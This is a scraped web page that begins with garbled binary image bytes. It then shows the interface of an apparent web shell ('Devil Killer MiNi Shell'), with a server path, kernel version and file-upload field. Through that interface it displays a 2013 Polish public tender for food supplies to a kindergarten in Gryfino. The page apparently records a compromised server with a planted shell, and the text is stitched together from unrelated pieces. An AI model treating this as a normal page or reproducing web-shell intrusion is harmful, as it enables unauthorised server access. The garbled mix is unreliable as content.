JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130813/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130813/326818-N-2013.html

<p class="kh_header"><b>Gryfino: Zakup i dostawa produktów spożywczych</b><br>
<b>Numer ogłoszenia: 326818 - 2013; data zamieszczenia: 13.08.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Gryfino - Przedszkole Nr 2 im. Misia Uszatka , ul. Krzywoustego 5, 74-100 Gryfino, woj. zachodniopomorskie, tel. 91 4162925, faks 91 4152182.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://uszatkaprzedszkole.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup i dostawa produktów spożywczych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zakup i dostawa pieczywa/produktów zbożowych, nabiału, mleka i wyrobów mleczarskich, owoców i warzyw, produktów suchych, mięsa i wędlin, ryb, napoi, tłuszczy, mrożonek, jaj dla potrzeb Przedszkola Nr 2 im. Misia Uszatka w Gryfinie.

Zakres zamówienia: 
Grupa I - pieczywo/produkty zbożowe
1. Bułka tarta 0,5kg - 270 szt.,
2. Bułki świeże 0,09kg - 2000 szt.,
3. Chleb krojony 0,5 kg - 2200 szt.,
4. Chleb słonecznikowy 0,4 kg - 800 szt.,
5. Chleb staropolski 0,7 kg - 420 szt.
6. Chleb 7 ziaren 0,4 kg - 1800 szt.,
7. Chałka maślana 0,3kg - 120
8. Rogal maślany 0,10kg - 2000 szt.,
9. Bułka razowa z ziarnami 0,08kg - 4000 szt.,
10. Kawiorka 0,3 kg - 400 szt.,
11. Chrupki kukurydziane - opakowanie 0,07 kg - 1000 szt.,
12. Drożdżówki 0,10kg - 750 szt.,
13. Makaron nitka cięta typu Lubella 0,4 kg lub równoważny - 300 kg,
14. Makaron muszelka drobna Lubella 0,4kg lub równoważny - 165 kg,
15. Zacierka goliard lub równoważna - 38 kg,
16. Makaron świderki Lubella 0,4 kg lub równoważny - 120 kg,
17. Makaron nitka rosołowa goliard lub równoważny - 50 kg,
18. Makaron wielozbożowy razowy Lubella co najmniej 0,4 kg lub równoważny - 60 kg,
19. Makaron kokardki Lubella 0,4 kg lub równoważny - 20 szt,
20. Makaron kolorowy świder 0,5 kg - 	60 szt.,
21. Płatki jęczmienne - 26 kg,
22. Kasza pęczak - 150 kg,
23. Płatki ryżowe - 20 kg,
24. Płatki kukurydziane Nestle lub równoważne - 140 kg,
25. Płatki owsiane - 8 kg,
26. Kasza kukurydziana - 15 kg,
27. Kasza manna - 80 kg,
28. Kasza jęczmienna - 40 kg,
29. Kasza jęczmienna saszetki 0,4kg - 150 szt.
30. Kasza gryczana saszetki 0,4kg - 280 szt.
31. Kasza jaglana - 58 kg,
32. Mąka pszenna - 420 kg.

Grupa II - nabiał, mleko i wyroby mleczarskie
1. Kefir augustowski 0,4l lub równoważny - 500 szt,
2. Jogurt naturalny zott 0,37l lub równoważny - 2500 szt.,
3. Lody Big Milk 100g lub równoważne - 325 szt.,
4. Mleko świeże 1 litr - 9000 litrów
5. Kaszka mleczna Bobovita 0,23 kg lub równoważna - 50 szt.,
6. Ser topiony Hochland lub równoważny - 60 kg,
7. Ser żółty typu Gouda lub równoważny - 200 kg,
8. Serek homogenizowany Danio waniliowy 0,15 kg lub równoważny	 - 5000 sz.,
9. Śmietana łaciata 0,5l, 18% lub równoważna - 1000 szt.,
10. Śmietana wiejska 12% - 0,4l - 320 szt.,
11. Twaróg półtłusty - 35 kg,
12 Twaróg śmietankowy - 450 kg,
13 Serek Bakuś lub równoważny 0,10kg - 200 szt.,
14 Deser sojowy waniliowy 0,125 - 180 szt.

Grupa III - owoce i warzywa

OWOCE
1. Arbuz - 200 kg,
2. Banan	- 1500 kg,
3. Brzoskwinia - 75 kg,
4. Cytryna - 100 kg,
5. Jabłka	- 3000 kg,
6. Kiwi - 1200 szt.,
7. Truskawki św. - 120 kg,
8. Mandarynka - 400 kg,
9. Śliwka sezonowa - 20 kg,
10 Morela - 40 kg,
11 Pomarańcza - 1000 kg
12 Nektaryna - 300 kg,
13 Winogrono - 100 kg,
14 Szarlotka jabłka - słoik 0,9 litra - 70 szt.
WARZYWA
1. Burak czerwony	- 1100 kg,
2. Cebula	- 340 kg,
3. Botwina - 40 pęcz.,
4. Brukselka - 5 kg,
5. Fasola sucha łuskana - 20 kg,
6. Groch suchy łuskany - 50 kg,
7. Kapusta biała	- 60 kg,
8. Kapusta młoda - 40 kg,
9. Kapusta pekińska - 350 kg,
10 Kapusta czerwona - 140 kg,
11 Kapusta kiszona - 380 kg,
12. Koper zielony - 750 pęcz.,
13. Kalafior świeży - 200 szt.,
14 Ogórek świeży - 400 kg,
15. Kapusta włoska - 20 szt.,
16. Marchew - 2000 kg,
17. Natka pietruszki - 1100 pęcz.,
18. Ogórek kiszony	- 320 kg,
19. Szczaw - 30 pęcz.,
20. Papryka świeża - 120 kg,
21. Cukinia - 10 kg,
22. Por - 130 kg,
23 Pietruszka - 400 kg,
24. Pomidor świeży	 - 500 kg,
25. Rzodkiewka - 650 pęcz.,
26 Rzodkiew biała - 80 kg,
27. Seler	- 550 kg,
28 Szczypior - 650 pęcz.,
29 Sałata zielona lodowa - 280 szt.,
30 Ziemniaki - 13500 kg,
33 Kiełki brokuła - 5 kg,
34 Kiełki rzodkiewki - 5 kg

Grupa IV - produkty suche
1. Cukier 1 kg - 1200 kg
2. Cukier puder 0,5 kg - 6 szt.
3. Cukier waniliowy 32 g - 550 szt.
4. Barszcz biały Winiary lub równoważny torebka 0,066kg	- 500 szt.
5. Bazylia 0,01kg - 20 szt.
6. Herbatniki be be co najmniej 16g. lub równoważne - 2000 szt.
7. Biszkopty petit 0,012 kg lub równoważne - 250 szt.
8. Brzoskwinia puszka co najmniej 2,6 kg - 12 szt.
9 Brzoskwinia puszka co najmniej 0,560 kg - 140 szt.
10 Deser bobovita 0,125kg lub równoważny - 800 szt.
11 Deser gerber 0,125kg lub równoważny - 50 szt.
12 Dynia łuskana 0,10kg - 160 szt.
13 Dżem  Łowicz 0,28kg lub równoważny - 240 szt.
14 Herbata saga 100 torebek lub równoważna - 100 szt.
15 Herbata owocowa ekoland 0,3kg lub równoważna - 100 szt.
16 Herbata Rooibos 25 torebek, 0,037kg lub równoważna - 30 szt.
17 Herbatka Hipp 0,2 kg lub równoważna - 15 szt.
18 Kakao co najmniej 150g - 90 szt.
19 Kawa Inka co najmniej 150g lub równoważna	- 150 szt.
20 Kisiel cytrynowy z cukrem 0,077kg - 1800 szt.
21 Koncentrat pomidorowy co najmniej 1kg - 160 szt.
22 Koncentrat pomidorowy co najmniej 200g - 60 szt.
23 Kukurydza puszka Bonduelle co najmniej 400g lub równoważna - 180 szt.
24 Kwasek cytrynowy 0,020kg - 140 szt.
25 Liść laurowy Appetita 0,010 kg lub równoważna - 20 szt.
26 Lubisie herbatniki 0,03kg lub równoważne - 1700 szt.
27 Majeranek 0,010kg - 40 szt.
28 Majonez Rzymski co najmniej 1kg	- 45 szt.
29 Herbata miętowa 0,08kg - 12 szt.
30 Miód co najmniej 400g - 160 szt.
31 Morela suszona co najmniej 100g. - 40 szt.
32 Oregano 0,010kg - 20 szt.
33 Orzechy laskowe co najmniej 100g	- 20 szt.
34 Papryka słodka mielona 0,010kg - 300 szt.
35 Pieprz mielony 0,010kg - 200 szt.
36 Pieprz cytrynowy 0,010kg - 40 szt.
37 Rodzynki co najmniej 200g - 200 szt.
38 Ryż biały - 100 kg,
39 Ryż saszetki Sonko lub równoważny 0,4kg - 280 szt.
40 Sezam - 8 kg,
41 Sezamki 0,03kg	- 500 szt.
42 Skrobia ziemniaczana co najmniej 0,5kg - 10 szt.
43 Słonecznik łuskany co najmniej 100g - 250 szt.
44 Soczewica czerwona - 10 kg,
45 Sól 1kg - 200 kg,
46 Tymianek 0,010kg - 15 szt.
47 Wafle ryżowe Sonko co najmniej 120g lub równoważne	 - 600 szt.
48 Ziele angielskie 0,010kg - 20 szt.
49 Zioła prowansalskie 0,010kg - 15 szt.
50 Żurawina suszona  1kg - 60 kg,
51 Żurek butelka 0,5 litra - 80 szt.
52 Żurek Winiary w torebce 0,066kg lub równoważny - 100 szt.
53 Pasztet profi firmowy co najmniej 130g lub równoważny - 1300 szt.
54 Groszek konserwowy co najmniej 400g - 150 szt.
55 Ketchup kotlin łagodny 450g. lub równoważny - 300 szt.

Grupa V - mięso i wędliny
1. Łopatka b/k - 980 kg,
2. Szynka b/k - 200 kg,
3. Schab b/k - 350 kg,
4. Kurczak - 250 kg,
5. Filet z kurczaka bez skóry	- 500 kg,
6. Korpus - 750 kg,
7. Filet z indyka - 150 kg,
8. Pałki drobiowe - 300 kg,
9. Kiełbasa Krakowska drobiowa - 80 kg,
10. Kurczak gotowany/wędlina - 30 kg,
11. Kiełbasa podwawelska - 15 kg,
12 Parówki cielęce	- 400 kg,
13 Polędwica drobiowa - 60 kg,
14 Szynka z wędzarni - 60 kg,
15 Szynka łezka - 60 kg,
16 Baton drobiowy	- 20 kg.

Grupa VI - ryby
1. Makrela wędzona - 180 kg,
2. Morszczuk filet b/skóry - 280 kg,
3. Miruna ze skórą filet - 500 kg.

Grupa VII - napoje
1. Woda żywiec niegazowana 1,5 L lub równoważna - 1000 litr,
2. Woda żywiec dziubek 0,33L lub równoważna	- 1000 szt.
3. Sok multiwitamina Hortex  1 litr lub równoważna - 300 litr,
4. Sok bobofrut 300ml lub równoważny - 500 szt.
5. Sok pomarańczowy 100% - 1litr - 100 litr,
6. Soczki Leon Hortex 200ml lub równoważne - 2500 szt.
7. Syrop Herbapol 420ml lub równoważny - 50 szt.
8. Sok Kubuś pomarańczowy 0,33l lub równoważny - 120 szt.

Grupa VIII - tłuszcze
1. Olej kujawski 1L lub równoważny - 450 szt.
2. Masło Extra co najmniej 200g - 2800 szt.
3. Oliwa z oliwek extra vergine co najmniej 250ml - 12 szt.
4. Oliwa z oliwek extra vergine  co najmniej 0,5L - 20 szt.
5. Oliwa z oliwek extra vergine  co najmniej 1L - 25 szt.

Grupa IX - mrożonki
1. Brokuł	- 180 kg,
2. Brukselka - 14 kg,
3. Bukiet warzyw (brokuł, marchew, kalafior) - 100 kg,
4. Fasolka szparagowa cięta żółta - 60 kg,
Fasolka szparagowa cięta zielona - 200 kg,
5. Kalafior - 130 kg,
6. Malina	- 180 kg,
7. Truskawka - 500 kg,
8. Marchew z groszkiem - 30 kg,
9. Marchew kostka	- 60 kg,
10. Mieszanka kompotowa z  czarną porzeczką	- 450 kg,
11. Mieszanka kompotowa bez śliwki	- 200 kg,
12 Czarna porzeczka - 320 kg,
13 Wiśnia	 - 20 kg,
14 Włoszczyzna paski - 20 kg.

Grupa X - jaja
1. jaja	- 10000 szt..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9, 15.20.00.00-0, 15.30.00.00-1, 15.40.00.00-2, 15.50.00.00-3, 15.60.00.00-4, 15.80.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 10.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstąpił od opisania warunku</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstąpił od opisania warunku</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstąpił od opisania warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstąpił od opisania warunku</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstąpił od opisania warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Strony dopuszczają możliwość
1) zmian redakcyjnych umowy, tj.: poprawienie numeracji artykułów, paragrafów, odesłań
2) zmian będących następstwem sukcesji uniwersalnej albo przejęcia z mocy prawa pełni praw i obowiązków dotyczących którejkolwiek ze Stron,
3) zmian danych Stron ujawnionych w rejestrach publicznych</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://uszatkaprzedszkole.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gmina Gryfino - Przedszkole Nr 2 im. Misia Uszatka w Gryfinie
ul. Krzywoustego 5, 74-100 Gryfino.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.08.2013 godzina 12:00, miejsce: miejsce: Gmina Gryfino - Przedszkole Nr 2 im. Misia Uszatka w Gryfinie
ul. Krzywoustego 5, 74-100 Gryfino
Biuro Dyrektora.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Częściowo dofinansowany: Projekt pn. Jak dobrze być Przedszkolakiem! Współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, nr umowy: UDA-POKL.09.01.01-32-039/12-00.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Grupa I - pieczywo/produkty zbożowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Grupa I - pieczywo/produkty zbożowe 1. Bułka tarta 0,5kg - 270 szt., 2. Bułki świeże 0,09kg - 2000 szt., 3. Chleb krojony 0,5 kg - 2200 szt., 4. Chleb słonecznikowy 0,4 kg - 800 szt., 5. Chleb staropolski 0,7 kg - 420 szt. 6. Chleb 7 ziaren 0,4 kg - 1800 szt., 7. Chałka maślana 0,3kg - 120 8. Rogal maślany 0,10kg - 2000 szt., 9. Bułka razowa z ziarnami 0,08kg - 4000 szt., 10. Kawiorka 0,3 kg - 400 szt., 11. Chrupki kukurydziane - opakowanie 0,07 kg - 1000 szt., 12. Drożdżówki 0,10kg - 750 szt., 13. Makaron nitka cięta typu Lubella 0,4 kg lub równoważny - 300 kg, 14. Makaron muszelka drobna Lubella 0,4kg lub równoważny - 165 kg, 15. Zacierka goliard lub równoważna - 38 kg, 16. Makaron świderki Lubella 0,4 kg lub równoważny - 120 kg, 17. Makaron nitka rosołowa goliard lub równoważny - 50 kg, 18. Makaron wielozbożowy razowy Lubella co najmniej 0,4 kg lub równoważny - 60 kg, 19. Makaron kokardki Lubella 0,4 kg lub równoważny - 20 szt, 20. Makaron kolorowy świder 0,5 kg - 60 szt., 21. Płatki jęczmienne - 26 kg, 22. Kasza pęczak - 150 kg, 23. Płatki ryżowe - 20 kg, 24. Płatki kukurydziane Nestle lub równoważne - 140 kg, 25. Płatki owsiane - 8 kg, 26. Kasza kukurydziana - 15 kg, 27. Kasza manna - 80 kg, 28. Kasza jęczmienna - 40 kg, 29. Kasza jęczmienna saszetki 0,4kg - 150 szt. 30. Kasza gryczana saszetki 0,4kg - 280 szt. 31. Kasza jaglana - 58 kg, 32. Mąka pszenna - 420 kg..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.60.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Grupa II - nabiał, mleko i wyroby mleczarskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Grupa II - nabiał, mleko i wyroby mleczarskie 1. Kefir augustowski 0,4l lub równoważny - 500 szt, 2. Jogurt naturalny zott 0,37l lub równoważny - 2500 szt., 3. Lody Big Milk 100g lub równoważne - 325 szt., 4. Mleko świeże 1 litr - 9000 litrów 5. Kaszka mleczna Bobovita 0,23 kg lub równoważna - 50 szt., 6. Ser topiony Hochland lub równoważny - 60 kg, 7. Ser żółty typu Gouda lub równoważny - 200 kg, 8. Serek homogenizowany Danio waniliowy 0,15 kg lub równoważny - 5000 sz., 9. Śmietana łaciata 0,5l, 18% lub równoważna - 1000 szt., 10. Śmietana wiejska 12% - 0,4l - 320 szt., 11. Twaróg półtłusty - 35 kg, 12 Twaróg śmietankowy - 450 kg, 13 Serek Bakuś lub równoważny 0,10kg - 200 szt., 14 Deser sojowy waniliowy 0,125 - 180 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Grupa III - owoce i warzywa.</p>
